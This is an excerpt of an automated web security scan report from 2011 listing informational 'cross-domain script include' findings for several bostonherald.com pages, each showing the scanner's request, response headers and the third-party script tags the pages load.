<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.640. http://www.bostonherald.com/gift_guide/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /gift_guide/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /gift_guide/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:01:00 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 75381

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // section_beta.tmpl // --
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.641. http://www.bostonherald.com/homepage.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /homepage.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /homepage.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:34 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.642. http://www.bostonherald.com/index.bg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /index.bg

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /index.bg HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:13:12 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 157225

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
<!-- // 728_SWAP_TEMPLATE // -
...[SNIP]...
<!--// end INTERSTITIAL //-->
<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js?nocache=123" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<div id="containerSliderInner">
<script src="http://cache.heraldinteractive.com/js/carousel.js" type="text/javascript"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/game.aspx?team=028"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nflgame.aspx?team=077"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nbagame.aspx?team=092"></script>
...[SNIP]...
<div>
<script type="text/javascript" language="Javascript" src="http://scores.heraldinteractive.com/aspdata/clients/herald/nhlgame.aspx?team=121"></script>
...[SNIP]...
<div id="busTabsHp" style="width:180px; margin:0 auto;">
<script language="javascript" src="http://hosted.ap.org/dynamic/proxy-partial-js/ibd.morningstar.com/AP/MarketIndexGraph.html?CN=AP707&gf=3&idx=2&SITE=MABOH&SECTION=DJSP_COMPLETE"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...
</script>
<SCRIPT language="JavaScript" src="http://q1digital.checkm8.com/adam/cm8adam_1_call.js"></SCRIPT>
...[SNIP]...

18.643. http://www.bostonherald.com/intra/hashtag/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /intra/hashtag/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /intra/hashtag/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 404 Not Found
Date: Sat, 29 Jan 2011 04:14:56 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 28827

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>
   <!-- // generic_TOP.tmpl // -->
...[SNIP]...
<!-- Google hosts a compressed, cacheable version of Prototype -->
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js?nc=1" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.644. http://www.bostonherald.com/jobfind/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/ HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:02:42 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 60213

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >

<head>
<!-- // jobfind/index.tmpl
...[SNIP]...
<link rel="alternate" title="Jobfind - BostonHerald.com" href="http://feeds.feedburner.com/bostonherald/jobfind/" type="application/rss+xml">

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
   <script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>

   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
<form name="newsearchform" method="get" action="http://jobfind.salary.com/salarywizard/layoutscripts/swzl_titleselect.asp" onsubmit="return gotoTitleSelect();"><script language="javascript" src="http://bostonherald.salary.com/salarywizard/utilityscripts/swzu_v4_jsfunc.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.645. http://www.bostonherald.com/jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:18 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 37708

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.646. http://www.bostonherald.com/jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:04:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39440

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.647. http://www.bostonherald.com/jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
Path:   /jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also HTTP/1.1
Host: www.bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ebNewBandWidth_.www.bostonherald.com=776%3A1296254384244; bhfont=12; __utmz=1.1296251844.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2804%3Bkvq%3D2803%3Bkvq%3D2802%3Bkvq%3D2526%3Bkvq%3D2525%3Bkvq%3D2524%3Bkvq%3D2523%3Bkvq%3D2515%3Bkvq%3D2510%3Bkvq%3D2509%3Bkvq%3D2502%3Bkvq%3D2501%3Bkvq%3D2473%3Bkvq%3D2413%3Bkvq%3D2097%3Bkvq%3D2093%3Bkvq%3D2092%3Bkvq%3D2091%3Bkvq%3D2090%3Bkvq%3D2088%3Bkvq%3D2087%3Bkvq%3D2086%3Bkvq%3D2084%3Bkvq%3D2079%3Bkvq%3D1755%3Bkvq%3D1133; bhpopup=on; OAX=rcHW801DO8kADVvc; __utma=1.872358987.1296251844.1296251844.1296251844.1; __utmc=1; __qca=P0-1247593866-1296251843767; __utmb=1.56.10.1296251844; RMFD=011PiwJwO101yed8|O2021J3t|O3021J48|P3021J4T|P2021J4m; oggifinogi_uniqueSession=_2011_1_28_22_52_11_945_394437891;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:03:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 45299

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>

<!-- // article.t
...[SNIP]...
</script> -->

<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
   

       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->


<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">

</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js">
</script>
...[SNIP]...

18.648. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bostonherald.com
